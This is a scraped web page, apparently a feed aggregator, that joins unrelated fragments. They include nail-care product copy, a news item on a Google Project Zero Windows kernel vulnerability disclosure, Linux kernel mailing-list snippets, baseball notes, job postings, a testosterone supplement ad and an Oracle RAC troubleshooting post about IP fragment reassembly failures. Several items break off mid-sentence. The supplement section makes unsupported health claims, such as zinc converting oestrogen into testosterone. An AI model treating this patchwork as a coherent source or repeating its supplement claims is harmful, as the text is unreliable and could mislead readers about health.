This unique formula instantly conceals nail damage while defending against peels, breaks and splits. The sheer, nude finish gives nails a nice neutral finish unlike many clear treatments.  Microbead Polymer works to fill in ridges and help defend against peels, breaks and splits while a blend of Arctic Berry Oils and Vitamin C & E condition nails. After removal on the fifth day, nails look healthier, brighter and feel stronger!

Problem: Uneven Nail Beds
Solution: Cutex Ridge Filler
Fill in uneven nail surfaces and conceal ridges with this unique formula with Microbead Polymer that creates an even base for nail color to adhere to and prevents staining from dark polishes. Wear alone or under your chosen nail polish.


Problem: Dry Cuticles
Solution: Cutex Hydrating Cuticle Oil

Treat dry, rough cuticles with this non-greasy formula that provides instant hydration to the cuticles. A blend of Sweet Almond Oil, Jojoba Seed Oil & Rice Bran Oil will leave cuticles soft, healthy and moisturized.

          USDS bug postmortem. Alternatively, what does the Linux kernel have to do with Cisco router firmware?   
- Source: www.reddit.com
          Project Zero discloses a vulnerability in the Windows kernel   

For some time now, Google has had a team of security experts, called Project Zero, who constantly hunt for security flaws in today's software so that vendors can fix them before they are discovered by malicious hackers. The deadlines for fixing them are not unlimited, however: developers, whether independent or a giant like Microsoft, have at most 90 days to release a patch; otherwise the flaw is made public and puts all users at risk, as has just happened with a newly disclosed Windows security flaw.

It is not the first time Google has embarrassed Microsoft (and endangered users) by publishing flaws in its Windows operating system, and it will not be the last. A few hours ago, Project Zero engineers disclosed a new vulnerability in the Windows kernel that could allow an attacker to evade the operating system's security and mitigation measures with relative ease.

This security flaw was discovered last March by the Google group's engineers and was immediately reported to Microsoft, which fixed it and released a patch with this month's Windows security updates. Something went wrong at Microsoft, however: although in theory the patch should have fixed the vulnerability, it remains present on all machines, and with the deadline expired, the flaw has finally been made public.

According to the Project Zero engineers, this vulnerability can allow any user to access Windows kernel memory and, with a simple exploit, bypass the operating system's protection and threat-mitigation systems. The vulnerability has been rated medium severity and apparently only affects users of the 32-bit versions of Windows, from Windows 7 through Windows 10.

Microsoft is in no hurry to fix this Windows vulnerability, and the patch may slip until after the summer.

Microsoft fixed the security flaw, yet for some reason it has remained present on systems, so Google has finally made it public, as its program promises.

If Microsoft got the patch wrong, the logical step would be to release a new one as soon as possible (since this is not a known-exploited or high-severity vulnerability, not necessarily out of band), for example with the next security updates scheduled for July 11. However, Microsoft has stated it is in no hurry to fix the vulnerability.

So unless Microsoft reconsiders and does fix the flaw, we may not see this patch in either the July or the August security updates.

As noted, the vulnerability only affects 32-bit systems, so if our Windows is 64-bit, we have nothing to worry about.

https://www.redeszone.net/2017/06/28/project-zero-vulnerabilidad-kernel-windows/
          Former Husky Marzi’s contract purchased by Twins   
The former UConn pitcher gets a second chance with an MLB organization. For the past two seasons, former UConn Huskies pitcher and Berlin, Connecticut native Anthony Marzi has pitched close to home for the independent New Britain Bees of the Atlantic League. But now, Marzi will get another chance to impress a Major League Baseball organization. Due to injuries with their Single-A club in Cedar Rapids, Iowa, the Minnesota Twins have purchased the contract of Marzi from the Bees. It’s expected that Marzi will step into the Cedar Rapids Kernels rotation. Marzi was undrafted out of UConn after the 2014 season but signed with the New York Yankees in the winter of 2015. He pitched six games for the Yankees Gulf Coast League team where he allowed just three hits in 7 1⁄3 innings over six appearances. After being released by the Yankees in March of 2016, he tried out for the Bees and made the club out of their spring training. In two seasons for the side from hard-hitting New Britain, Marzi has a 10-6 record,
          Comment on Installing Linaro for a Beagle xM by Michael Hudson   
Sorry for the delay in moderation! The answer is no, not really. Linaro is an effort to improve the Linux on ARM experience, so we do work upstream in the kernel and gcc for example. As a demo and to validate our work, we produce installable images (which are based on Ubuntu) but that's not the end goal. We do also work with downstreams such as Ubuntu and OpenEmbedded and so on to help them make use of what we provide.
          TuxMachines: Servers: Containers, Ansible, and Puppet   
  • Kubernetes 1.7 Improves Container Security and API Aggregation

    The open-source Kubernetes 1.7 release is now available, providing users with new features to help manage and secure container infrastructure.

    Kubernetes 1.7 is the second major release of the open-source container orchestration platform so far in 2017 and follows the Kubernetes 1.6 release that debuted in March at the CloudNative Con/Kubecon event in Berlin, Germany. The Kubernetes project was first developed by Google and has been an open-source project run by the Linux Foundation's Cloud Native Computing Foundation (CNCF) since July 2015.

  • Why Portability is Not the Same Thing as Compatibility

    The Container Host *is* the Container Engine, and Container Image Compatibility Matters

    Have you ever wondered how containers are so portable? How it's possible to run Ubuntu containers on CentOS, or Fedora containers on CoreOS? How it is that all of this just magically works? As long as I run the docker daemon on all of my hosts, everything will just work, right? The answer is... no. I am here to break it to you: it's not magic. I have said it before, and I will say it again, containers are just fancy Linux processes. There is not even a container object in the Linux kernel; there never has been. So, what does all of this mean?

  • LinchPin: A simplified cloud orchestration tool using Ansible

    Late last year, my team announced LinchPin, a hybrid cloud orchestration tool using Ansible. Provisioning cloud resources has never been easier or faster. With the power of Ansible behind LinchPin, and a focus on simplicity, many cloud resources are available at users' fingertips. In this article, I'll introduce LinchPin and look at how the project has matured in the past 10 months.

    Back when LinchPin was introduced, using the ansible-playbook command to run LinchPin was complex. Although that can still be accomplished, LinchPin now has a new front-end command-line user interface (CLI), which is written in Click and makes LinchPin even simpler than it was before.

  • Building Puppet's unofficial forge community

    A Puppet module might only be some 500 lines of code and a bunch of tests, but that doesn't mean it's effortless to maintain. Puppet modules should run on a range of operating systems and support a range of Puppet versions (and hence, Ruby versions)—and that in and of itself makes it quite challenging.

    So while a single person could easily write a Puppet module, what happens when that person gets sick? Changes jobs? Or simply loses interest?

read more


          TuxMachines: What Motivates Torvalds, What Excites Larabel About Linux, and Latest Linux Foundation Announcements   
  • Video: Linus Torvalds Explains How Linux Still Surprises and Motivates Him

    Linus Torvalds took to the stage in China for the first time Monday at LinuxCon + ContainerCon + CloudOpen China in Beijing. In front of a crowd of nearly 2,000, Torvalds spoke with VMware Head of Open Source Dirk Hohndel in one of their famous “fireside chats” about what motivates and surprises him and how aspiring open source developers can get started. Here are some highlights of their talk.

  • What Excites Me The Most About The Linux 4.12 Kernel

    If all goes according to plan, the Linux 4.12 kernel will be officially released before the weekend is through. Here's a recap of some of the most exciting changes for this imminent kernel update.

  • The Linux Foundation Announces 18 New Silver Members

    With the support of its members, The Linux Foundation hosts open source projects across technologies including networking, security, cloud, blockchain and more. This collaborative development model is helping technology advance at a rapid pace in a way that benefits individuals and organizations around the world.

  • Diversity Empowerment Summit Facilitates Inclusion and Culture Change

    Check out the session highlights for the new Diversity Empowerment Summit (DES), which will take place Sept. 14, 2017, in Los Angeles as part of Open Source Summit North America.

read more


          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Re: [GIT PULL 00/30] perf/core improvements and fixes   
Ingo Molnar writes: * Arnaldo Carvalho de Melo <acme@kernel.org> wrote: create mode 100644 tools/perf/scripts/python/intel-pt-events.py
Pulled, thanks a lot Arnaldo!
Ingo

          Re: [PATCH v6 05/21] net-next: stmmac: Add dwmac-sun8i   
Corentin Labbe writes: (Summary) On Tue, Jun 27, 2017 at 10:37:34AM -0700, Florian Fainelli wrote: discussions a little later today.
Hello
I wait for your comment before sending my revert patch for http://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1431579.html Could you confirm that internal is only meant for "non xMII internal protocol"?
Regards

          [PATCH tip/perf/core 3/7] perf probe: allow placing uprobes in alt ...   
Krister Johansen writes: (Summary)

+	}
 }

 static int convert_exec_to_group(const char *exec, char **result)
@@ -366,7 +372,8 @@ static int kernel_get_module_dso(const char *module, struct dso **pdso)
 static int find_alternative_probe_point(struct debuginfo *dinfo,
 					struct perf_probe_point *pp,
 					struct perf_probe_point *result,
-					const char *target, bool uprobes)
+					const char *target, struct nsinfo *nsi,
+					bool uprobes)
 {
 	struct map *map = NULL;
          Re: [RFC][PATCHv3 2/5] printk: introduce printing kernel thread   
Sergey Senozhatsky writes: (Summary)
> ... that care to limit how much time printk can stop a CPU by ...
> when there's no holder of console lock, the critical thread takes control
> all prints will be in critical ...
> an NMI-safe lock in printk (like Peter Zijlstra and I have patches for)
> which checks if the current CPU owns the spin lock; if the current CPU has the lock, then the NMI handler does the printing without locking, not caring if it screws up the thread that is currently ...
          Re: [PATCH v2] ACPI: surface3_power: MSHW0011 rev-eng implementation   
Sebastian Reichel writes: (Summary) Hi,
On Thu, Jun 29, 2017 at 02:10:09PM +0200, Benjamin Tissoires wrote: + bix->design_capacity = le16_to_cpu(ret);
i2c_smbus_read_word_data() returns native endianness for a little-endian bus (it basically has a built-in le16_to_cpu). Your conversion actually _breaks_ support on big-endian machines by converting it back.
That seems to be a common mistake in the kernel and it might be a good idea to add a Coccinelle script for it?
-- Sebastian
          Re: [PATCH] kbuild: modpost: Warn about references from rodata to ...   
Rob Clark writes: (Summary) the explosions you get with these mistakes when building drivers as modules in a distro kernel config are quite "fun" to debug..
I'm not quite sure about the rules for whether merging this would count as a regression, but I would argue those drivers are already broken, just no one noticed yet. So I wouldn't be against merging this first to force drivers to fix their crap ;-)
BR,
-R
a Linux Foundation Collaborative Project

          Re: [HMM 12/15] mm/migrate: new memory migration helper for use wi ...   
Evgeny Baskakov writes: (Summary) Hi Jerome,
It seems that the kernel can pass 0 in src_pfns for pages that it cannot migrate; for such pages the respective 'src' PFN entries are always set to 0 without any flags. The documentation instead unconditionally suggests checking if the MIGRATE_PFN_VALID and MIGRATE_PFN_MIGRATE flags are set. The driver sees a zero page in the 'src' entry and ignores any flags in such a case. It would be more logical if migrate_vma kept the zero in the PFN entries for pages that are not allocated, but set the MIGRATE_PFN_MIGRATE flag anyway.
NVIDIA
          Pattern of black screens with Linux on newer laptops.   
"David F." writes: (Summary) Using up to and including 4.11.7, getting reports coming in of black screens on new laptops (including booting to console only). The solution is to use kernel parameter acpi=off (although searching the Internet, even older systems are affected, like the HP Envy 17 j053ea and others, where pci=noacpi is enough to get it working). Be nice for Linux to "just work" on these systems without special kernel parameters.
          did vfs_read or something related to it get broken?   
"David F." writes: (Summary) Hi,
I have a driver that reads data from a file that has worked from kernel 3.x up to 4.9.13. int driver_file_read(struct file *file, unsigned char *data, unsigned int size) { int ret; } struct file *driver_file_open(const char *path, int flags, int mode, int *err) { int ec=0; } // update callers error code if (err) { *err=ec; } // return pointer to file return (filp);
          Re: [PATCH] kmod: add dependencies for test module   
"Luis R. Rodriguez" writes: On Fri, Jun 30, 2017 at 05:47:44PM +0200, Arnd Bergmann wrote: Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Luis R. Rodriguez <mcgrof@kernel.org>
  Luis

          Cavaness' single leads Cedar Rapids to 6-2 win over Clinton   
CLINTON, Iowa - Christian Cavaness hit a two-run single in the seventh inning, leading the Cedar Rapids Kernels to a 6-2 win over the Clinton LumberKings on Friday.
          (USA-WA-Redmond) Senior Software Engineer   
We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 Petabytes), or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of software stack - from the Windows kernel storage drivers to massively replicated, PAXOS-based distributed system that coordinates global storage allocation. Our team subscribes to all modern paradigms of software development - we roll out to production every week, we code-review every change, we use cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amount of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years. We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success. Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development, and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe. 
We have the resources of a huge, powerful company behind it, but none of the bureaucratic overhead that is often associated with it. We are at the tip of tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more! Preferred Qualifications: •Distributed systems, or operating systems kernel and driver development. •Experience with the Windows Storage stack and SQL Server is preferred •C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five). Basic Qualifications: •5+ years of commercial software development experience “You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” Ability to meet Microsoft, customer and/or government security screening requirements are required for this role. These requirements include, but are not limited to the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances. 
If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          (USA-WA-Redmond) Principal Software Engineer   
We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 Petabytes), or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of software stack - from the Windows kernel storage drivers to massively replicated, PAXOS-based distributed system that coordinates global storage allocation. Our team subscribes to all modern paradigms of software development - we roll out to production every week, we code-review every change, we use cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amount of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years. We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success. Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development, and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe. 
We have the resources of a huge, powerful company behind it, but none of the bureaucratic overhead that is often associated with it. We are at the tip of tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more! Preferred Qualifications: •Distributed systems, or operating systems kernel and driver development. •Experience with the Windows Storage stack and SQL Server is preferred •C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five). Basic Qualifications: •5+ years of commercial software development experience “You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” Ability to meet Microsoft, customer and/or government security screening requirements are required for this role.
These requirements include, but are not limited to the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances. If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          (USA-WA) Staff Engineer – Samsung Mobile R&D Lab   
**General Description** Samsung R&D Lab in Bellevue, WA is looking for talented Mobile Software Engineers for supporting Samsung’s mobile product commercialization and advanced service development with US carriers. Established in June 2011 as a local lab of Samsung R&D, the lab owns advanced technology collaboration with wireless carriers in the broad communication, computing, and entertainment domains covering technologies such as mobile wireless communication, big data, AR/VR, and AI. The lab is also responsible for carrier technical requirement analysis, architecture design and feature implementation of software services on device and in the cloud. We need software development engineers who are passionate about mobile technologies, software and services in the mobile and cloud space, as well as creating cutting edge innovations for Samsung’s next generation products and services, in the cloud and on devices. A Staff Software Engineer with the lab will play a technical lead role in many aspects of device engineering: requirement analysis, architecture design, implementation and commercialization of specific features on Android and Tizen devices, as well as debugging and resolving device issues across OS layers. The role is expected to provide technical guidance to junior engineers on software architecture, design patterns, engineering best practice, as well as task prioritization and professional communication internally and externally. Job Duties * As a Staff Engineer with full stack development experience, identify and propose innovations and new services, perform deep requirement analysis and software architecture design. Develop both server side and client side architecture and functional specifications by utilizing best design patterns and coding standards.
Provide guidance to the team in designing, developing and test planning throughout the entire engineering process with emphasis on design for usability, performance, scalability, testability and code coverage. * Mentor and manage junior engineers on complex issue analysis, architecture, design and development. * Perform root cause analysis of technical issues by leveraging deep expertise in broad mobile embedded system areas such as Android application performance, Android Framework, mobile OS internals, Linux kernel, system battery performance, system stability, and so on. * Evaluate internal engineering process and identify improvement for better software quality and shorter time to market. **Necessary Skills / Attributes** * Industry candidates are required to have at least 6 years of post-bachelor experience on mobile embedded systems (Android preferred) and/or server/services development. * Design, develop, unit test and deploy Android based solutions using common standards and frameworks. * Solid knowledge of Android SDK, understands the fundamentals of what makes good app design and can show examples of this. * Understanding of core Java &/ C++ and OOD. * Excellent knowledge of fundamentals of computer science – operating systems, data structures, algorithms, and TCP/IP networking concept–is mandatory. * Excellent written and verbal communication skills. * BS/MS/Ph.D. degree in Computer Science or related technical field or equivalent practical experience. Preferred Qualifications * Candidates with demonstrable expertise in Android internals or with development experience with phone OEMs will be given preference. * Strong sense of project ownership required. Self-motivated and comfortable to learn and solve complicated problems in new technical areas under pressure. **Company Information** SAMSUNG ELECTRONICS AMERICA BIG THINGS HAPPEN HERE. The amazing products for which Samsung is known world-wide are the results of the amazing people who work here. 
Their talent, creativity, dedication, and commitment to innovation are what make us who we are. To continue to be a world leader in technology, we focus on attracting the best talent available and offer a corporate culture in which every individual can challenge themselves to discover how good they are, and how great they can become. Headquartered in Ridgefield Park, NJ, and with offices in Richardson, TX and Palo Alto, CA, Samsung Electronics America, Inc. (SEA) is a wholly-owned subsidiary of Samsung Electronics Co. Ltd. and a world leader in technology. We market a broad range of award-winning consumer electronics, smartphones, information systems, and home appliances. Samsung's philosophy is based on our strong determination for growth, perpetual innovation and responsibility to corporate citizenship. As a result of our commitment to innovation and unique design, the Samsung organization is one of the most decorated brands in the electronics industry. Our company is currently ranked #7 in Interbrand’s "100 Best Global Brands," and named #3 on the Boston Consulting Group list as one of the world's most innovative companies in 2014. At Samsung we work hard – every day. It is a fast-paced and challenging work environment, and we are a nimble team that constantly pushes ourselves to be the best. If you have energy, passion, dedication and drive, and you thrive in a fast-paced workplace, the rewards at Samsung are many. Imagine working for a global company that is a world leader in innovation, in an environment where exciting things happen every day. Imagine working with an amazing group of visionaries/ individuals who make products that bring joy to millions of people across the globe every single day. Imagine where you want to be, and who you want to be. At Samsung...the possibilities are limitless. Apply today and find out why LinkedIn ranked us as one of North America’s Most InDemand Employers in 2014. 
To this end, we follow various protocols during the recruitment process, including but not limited to, avoiding the inadvertent disclosure of confidential information of the applicant’s former employer. Samsung Electronics America provides Equal Employment Opportunity for all individuals regardless of race, color, religion, gender, age, national origin, marital status, sexual orientation, status as a protected veteran, genetic information, status as a qualified individual with a disability or any other characteristic protected by law. *Category:* S/W Engineering *Full-Time/Part-Time:* Regular Full-Time *Location:* Bellevue, Washington
          EVOBOLIC - 240 caps   
Another more recent study (June of 2011) worked on 399 men in Tuscany, all of them over 65 years of age and observed that those who had less testosterone and less IGF-1 (insulin growth factor), presented a magnesium deficiency. (source)

Avena Sativa

Avena sativa (oat kernel) is known as a powerful aphrodisiac (source) and stimulator of testosterone levels, as well as having multiple benefits, increasing energy levels, reducing anxiety...

Nettle extract

Nettle is capable of increasing levels of free testosterone. This testosterone, unlike the kind bound to transport proteins, is the “active” testosterone responsible for the anticipated increase in strength and muscle mass.

Testofen® (fenugreek seed)

Testofen® is a patented fenugreek extract formula. Testofen has been shown to increase levels of free testosterone by up to 98% in an eight week trial with 60 people. (source)

Zinc

Zinc is an essential mineral and is required for the metabolic activity of 300 of the enzymes in the body and is deemed to be essential for cell division and the synthesis of DNA and proteins. These enzymes are involved in the metabolism of proteins, carbohydrates, fats and alcohol. Zinc is also a critical factor for the growth of tissues, healing of wounds, growth and maintenance of conjunctive tissue, the function of the immune system, the production of prostaglandins, bone mineralization, appropriate thyroid function, coagulation of blood, cognitive functions, foetal growth, the production of testosterone and sperm.

Spinach powder

Spinach powder is added to this testosterone precursor because spinach is rich in vitamin A and vitamin E, substances that stimulate the body to increase the secretion of testosterone. On the other hand, the consumption of zinc boosts the endogenous production of the male hormone par excellence, and this mineral is found in large quantities in spinach. It prevents the conversion of testosterone into oestrogen (the female sexual hormone) by inhibiting the aromatase enzyme. Zinc converts oestrogen into testosterone and increases the quantity of sperm.

Lactobacillus

It is considered a probiotic, or beneficial bacterium, for men and, amongst many other functions, it is in charge of improving digestion and the digestibility of the supplement's active principles. During digestion, it also helps with the production of vitamins such as niacin, folic acid and vitamin B6 (pyridoxine). Some studies show that L. acidophilus can help with the deconjugation and separation of amino acids.

Piperine

Improves the absorption of the product's active ingredients.

Vitamins B6 and B12

Improve assimilation of the product and act as catalysts in a multitude of metabolic processes. EvoBolic is a product designed to guarantee maximum quality at the best price possible.

The range of HSN Sports products enjoys the very best quality/price ratio in our catalogue. HSN Sports: from the factory directly to your home (without intermediaries)

Price: 31.73 € Special Price: 23.16 €
Special Expires on: Jul 2, 2017


          Comprehensive protection for companies: with o2 Business Protect powered by McAfee, always on the safe side in the office and on the go   
In times of global cyberattacks, protecting sensitive data is more important than ever for companies. With o2 Business Protect, Telefónica in Germany offers cross-device virus protection for all end devices within a company. Especially in view of the many and constantly emerging cyberthreats, protection against data loss and unauthorized data access are essential core elements of o2 Business […]
          China sees Hong Kong as inviolable core territory despite agreement   
Officially, Hong Kong has partial self-rule. But China does not tolerate the slightest deviation, says an expert.
          EC2 and Fedora: Still stuck at Fedora 8   

Amazon’s EC2 service is great for being able to roll out new servers quickly and easily. It’s also really nice because we don’t ever have to worry about physical hardware and can just spin up more instances as we need them for experimenting or whatever.

Unfortunately, they’re still stuck in the dark ages with the newest AMIs available for Fedora being Fedora 8 based. With Fedora 12 around the corner, that’s two years old — something of an eternity in the pace of distribution development. I’d love to help out and build newer images, but while anyone can publish an AMI and make it public, you can’t publish newer kernel images, which really would be needed to use the newer system.

So, if you’re reading this at Amazon or know of someone I can talk with to try to move this forward, please let me know (katzj AT fedoraproject DOT org). I’d really strongly prefer to continue with Fedora and RHEL based images for our systems as opposed to starting to spin up Ubuntu images for the obvious reasons of familiarity.

Comments
          Matt Zimmerman’s summary of development plans for Ubuntu 10.10   
Ubuntu CTO Matt Zimmerman just blogged a collection of links to Maverick development plans, from the Desktop, Server, Foundations and Kernel teams.
          interconnect fragmentation kills the cluster   
On a particular Oracle 2-node cluster (12.1) we faced random instances failing. Service requests at Oracle were opened, with limited result, as the failures were quite random and we could not link them to any trigger.
As it looked somewhat like a communication problem between the 2 nodes, the network team checked the switches involved - without any outcome.
While crashing instances were already a problem, it got worse one day when one node rebooted (according to the cluster's alert.log and cssd.log, due to network heartbeat issues) and then the cluster stack did not start anymore.

2016-12-12 03:35:34.203 [CLSECHO(54825)]CRS-10001: 12-Dec-16 03:35 AFD-9204: AFD device driver installed or loaded status: 'false' 
2016-12-12 09:17:25.698 [OSYSMOND(1247)]CRS-8500: Oracle Clusterware OSYSMOND process is starting with operating system process ID 1247
2016-12-12 09:17:25.699 [CSSDAGENT(1248)]CRS-8500: Oracle Clusterware CSSDAGENT process is starting with operating system process ID 1248
2016-12-12 09:17:25.854 [OCSSD(1264)]CRS-8500: Oracle Clusterware OCSSD process is starting with operating system process ID 1264
2016-12-12 09:17:26.899 [OCSSD(1264)]CRS-1713: CSSD daemon is started in hub mode
2016-12-12 09:17:32.220 [OCSSD(1264)]CRS-1707: Lease acquisition for node yyy2 number 2 completed
2016-12-12 09:17:33.280 [OCSSD(1264)]CRS-1605: CSSD voting file is online: ORCL:ASM_OCR_VOTE_1; details in /xxx/app/grid/diag/crs/yyy1/crs/trace/ocssd.trc.
2016-12-12 09:17:33.289 [OCSSD(1264)]CRS-1672: The number of voting files currently available 1 has fallen to the minimum number of voting files required 1.
2016-12-12 09:27:25.925 [CSSDAGENT(1248)]CRS-5818: Aborted command 'start' for resource 'ora.cssd'. Details at (:CRSAGF00113:) {0:0:22951} in /xxx/app/grid/diag/crs/yyy2/crs/trace/ohasd_cssdagent_root.trc.
2016-12-12 09:27:25.925 [OCSSD(1264)]CRS-1656: The CSS daemon is terminating due to a fatal error; Details at (:CSSSC00012:) in /xxx/app/grid/diag/crs/yyy2/crs/trace/ocssd.trc
2016-12-12 09:27:25.926 [OCSSD(1264)]CRS-1603: CSSD on node yyy2 shutdown by user.
Mon Dec 12 09:27:30 2016
Errors in file /xxx/app/grid/diag/crs/yyy2/crs/trace/ocssd.trc (incident=857):
CRS-8503 [] [] [] [] [] [] [] [] [] [] [] []
Incident details in: /xxx/app/grid/diag/crs/yyy/crs/incident/incdir_857/ocssd_i857.trc

CSS trace is filled with messages reporting no connectivity with node1:
2016-12-12 09:27:20.375584 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186 
2016-12-12 09:27:20.585624 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:20.633907 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:20.633912 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet
2016-12-12 09:27:20.656587 : CSSD:3124418304: clssnmvDHBValidateNCopy: node 1, yyy1, has a disk HB, but no network HB, DHB has rcfg 371663236, wrtcnt, 11120596, LATS 232008644, lastSeqNo 11120595, uniqueness 1476197219, timestamp 1481534839/2789302712
2016-12-12 09:27:20.868210 : CSSD:3119687424: clssnmSendingThread: Connection pending for node yyy1, number 1, flags 0x00000002
2016-12-12 09:27:21.375702 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186
2016-12-12 09:27:21.585813 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:21.634038 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:21.634046 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet
2016-12-12 09:27:21.657538 : CSSD:3124418304: clssnmvDHBValidateNCopy: node 1, yyy1, has a disk HB, but no network HB, DHB has rcfg 371663236, wrtcnt, 11120597, LATS 232009644, lastSeqNo 11120596, uniqueness 1476197219, timestamp 1481534840/2789303712
2016-12-12 09:27:21.868336 : CSSD:3119687424: clssnmSendingThread: Connection pending for node yyy1, number 1, flags 0x00000002
2016-12-12 09:27:22.375830 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186
2016-12-12 09:27:22.586063 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:22.634195 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:22.634203 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet

After even more investigation on the network, another SR was filed.

Due to previous SRs, oswatcher was already installed, and there we found the important information in the netstat segment:

zzz ***Fri Dec 9 14:54:54 GMT 2016 
Ip:
13943376329 total packets received
129843 with invalid addresses
0 forwarded
0 incoming packets discarded
11934989273 incoming packets delivered
11631767391 requests sent out
2 outgoing packets dropped
148375 fragments dropped after timeout
2498052793 reassemblies required
494739589 packets reassembled ok
353229 packet reassembles failed
411073325 fragments received ok
2109526776 fragments created

and after 2 minutes:
zzz ***Fri Dec 9 14:56:55 GMT 2016 
Ip:
13943469180 total packets received
129849 with invalid addresses
0 forwarded
0 incoming packets discarded
11935067348 incoming packets delivered
11631828206 requests sent out
2 outgoing packets dropped
148375 fragments dropped after timeout
2498069258 reassemblies required
494741345 packets reassembled ok
359542 packet reassembles failed
411073565 fragments received ok
2109528513 fragments created

The important part is the 6313 packet reassembles failed (the delta between the two snapshots), compared to 16465 reassemblies required.

This led to some notes which describe both our symptoms (instance and cluster stack failure)

RHEL 6.6: IPC Send timeout/node eviction etc with high packet reassembles failure (Doc ID 2008933.1)

and

The CRSD is Intermediate State and Not Joining to the Cluster (Doc ID 2168576.1)



